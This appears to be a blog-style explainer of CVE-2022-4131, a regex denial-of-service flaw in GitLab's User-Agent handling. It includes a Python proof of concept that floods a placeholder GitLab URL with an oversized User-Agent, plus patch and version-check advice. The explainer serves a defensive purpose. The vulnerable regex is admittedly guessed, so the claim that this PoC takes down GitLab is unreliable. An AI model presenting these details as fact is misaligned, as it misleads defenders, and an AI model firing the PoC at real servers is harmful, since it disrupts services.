CVE-2022-4131 - Exploiting a Regex Vulnerability in GitLab User-Agent Parsing for Denial of Service

In December 2022, a significant vulnerability (CVE-2022-4131) was disclosed in GitLab CE/EE. This issue affects:

All versions starting from 15.7 before 15.7.2

If left unpatched, a remote attacker can craft a malicious HTTP request that leverages a Regular Expression (regex) flaw in the way GitLab parses User-Agent headers. By doing so, the attacker can cause a Denial of Service (DoS), causing your GitLab instance to freeze or become unresponsive. In this article, we’ll break down what this means, how the vulnerability works, and show a simplified exploit example—all in plain English.

What’s Vulnerable?

GitLab sometimes uses regular expressions to parse headers like User-Agent. Regular expressions are patterns used to match text—very handy, but they can be tricky if not carefully written. If an attacker sends a weird or very long User-Agent string, it can make the regex engine work overtime, using massive CPU resources or even exhausting memory. This is called regex denial of service, or ReDoS.

15.7 ≤ version < 15.7.2

If your instance falls into these ranges, you must update as soon as possible.

Technical Details: What Happened?

The bug resides in GitLab’s handling code for HTTP User-Agent strings. Let’s look at a simplified example:

Suppose the following (rough) Ruby regex is used to check if a request comes from a Git client

if user_agent =~ /(git|Git|git-lfs|GitHub-Hookshot|Bitbucket-Webhooks)/
  # It's a known git client
end

But now imagine the real regex is much more complex and not efficiently designed. Malicious actors can exploit this by supplying a User-Agent string that causes *catastrophic backtracking*—where the regex engine spends huge amounts of time trying to match the pattern.

Suppose the regex in _app/controllers/application_controller.rb_ looks something like

/^(a+)+$/

This pattern may look innocent, but with the input 'aaaaaaaaaaaaaaaaaaaaaaa!' (a long string of 'a's followed by an exclamation point), the regex engine will try massive combinations before finally failing to match, spiking the CPU.

Python PoC

Here’s a simple proof-of-concept exploit using Python and the requests library. It floods the GitLab endpoint with an evil user agent:

import requests

target = "https://your-gitlab-instance.com/";
evil_ua = "a" * 500 + "!"

headers = {
    "User-Agent": evil_ua
}

for i in range(10):  # Send multiple requests to amplify effect
    r = requests.get(target, headers=headers)
    print(f"Request {i}: Status {r.status_code}")

> Warning: Only use this PoC in your own test environments! Launching it against systems you don’t own is illegal.

With enough requests, you’ll see high CPU load—and possibly an unresponsive GitLab server.

Performance hit: High CPU usage until the process is killed or the server is reset.

- Abuse potential: Anyone with network access to your GitLab could trigger this—no credentials needed.

Check your version

gitlab-rake gitlab:env:info | grep 'GitLab version'

Update as per GitLab’s official update instructions.

References

- GitLab Security Advisory – CVE-2022-4131
- National Vulnerability Database: CVE-2022-4131
- GitLab Update Guides
- Understanding Regular Expression Denial of Service (ReDoS)

Final Thoughts

CVE-2022-4131 is a real headache for anyone running an unpatched version of GitLab. Since this is a network-exploitable bug that doesn't require credentials, patching is critical. Always keep your software updated, and remember: even something as simple as a regex can take down your ops if not handled right.

Timeline

Published on: 01/12/2023 04:15:00 UTC
Last modified on: 01/18/2023 20:36:00 UTC